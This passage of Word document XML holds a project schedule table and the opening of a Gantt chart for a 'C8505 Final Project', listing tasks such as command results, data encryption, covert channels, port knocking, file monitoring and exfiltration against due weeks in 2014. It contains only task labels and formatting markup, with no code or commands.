            <w:tcW w:w="2494" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="solid" w:color="99CCFF" w:fill="99CCFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Week 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D04825" w:rsidTr="00D04825">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="298"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2703" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4112" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="solid" w:color="99CCFF" w:fill="99CCFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Server - Return Command Results</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2494" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="solid" w:color="99CCFF" w:fill="99CCFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Week 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D04825" w:rsidTr="00D04825">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="298"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2703" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4112" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="solid" w:color="FF99CC" w:fill="FF99CC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Server - Data Encryption</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2494" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="solid" w:color="FF99CC" w:fill="FF99CC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Week 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D04825" w:rsidTr="00D04825">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="298"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2703" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4112" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="solid" w:color="FF99CC" w:fill="FF99CC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Server - Covert Channels</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2494" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="solid" w:color="FF99CC" w:fill="FF99CC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Week 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D04825" w:rsidTr="00D04825">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="298"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2703" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4112" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="solid" w:color="FFFFCC" w:fill="FFFFCC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Port Knocking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2494" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="solid" w:color="FFFFCC" w:fill="FFFFCC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Week 5 (10.20.14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D04825" w:rsidTr="00D04825">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="298"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2703" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4112" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="solid" w:color="FFFFCC" w:fill="FFFFCC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Configuration File</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2494" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="solid" w:color="FFFFCC" w:fill="FFFFCC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Week 7 (11.03.14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D04825" w:rsidTr="00D04825">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="298"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2703" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4112" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="solid" w:color="FF8080" w:fill="FF8080"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>File Monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2494" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="solid" w:color="FF8080" w:fill="FF8080"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Week 7 (11.03.14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D04825" w:rsidTr="00D04825">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="298"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2703" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4112" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="solid" w:color="C0C0C0" w:fill="C0C0C0"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2494" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="solid" w:color="C0C0C0" w:fill="C0C0C0"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Week 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D04825" w:rsidTr="00D04825">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="298"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2703" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4112" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="solid" w:color="C0C0C0" w:fill="C0C0C0"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>README</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2494" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:val="solid" w:color="C0C0C0" w:fill="C0C0C0"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00D04825" w:rsidRDefault="00D04825" w:rsidP="00D04825">
            <w:pPr>
              <w:autoSpaceDE w:val="0"/>
              <w:autoSpaceDN w:val="0"/>
              <w:adjustRightInd w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Week 12 (12.08.14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00634A4B" w:rsidRDefault="00634A4B">
      <w:pPr>
        <w:sectPr w:rsidR="00634A4B">
          <w:footerReference w:type="default" r:id="rId14"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpXSpec="center" w:tblpY="-95"/>
        <w:tblW w:w="14963" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1628"/>
        <w:gridCol w:w="2208"/>
        <w:gridCol w:w="272"/>
        <w:gridCol w:w="1128"/>
        <w:gridCol w:w="959"/>
        <w:gridCol w:w="959"/>
        <w:gridCol w:w="886"/>
        <w:gridCol w:w="1128"/>
        <w:gridCol w:w="923"/>
        <w:gridCol w:w="1128"/>
        <w:gridCol w:w="904"/>
        <w:gridCol w:w="904"/>
        <w:gridCol w:w="941"/>
        <w:gridCol w:w="1339"/>
      </w:tblGrid>
      <w:tr w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidTr="00634A4B">
        <w:trPr>
          <w:trHeight w:val="515"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14963" w:type="dxa"/>
            <w:gridSpan w:val="14"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="000000"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="36"/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>GANTT Chart - C8505 Final Project</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidTr="00634A4B">
        <w:trPr>
          <w:trHeight w:val="230"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3836" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="434343" w:fill="434343"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00634A4B" w:rsidRPr="00634A4B" w:rsidRDefault="00634A4B" w:rsidP="00634A4B">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00634A4B">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Milestones</w:t>
            </w:r>
          </w:p>
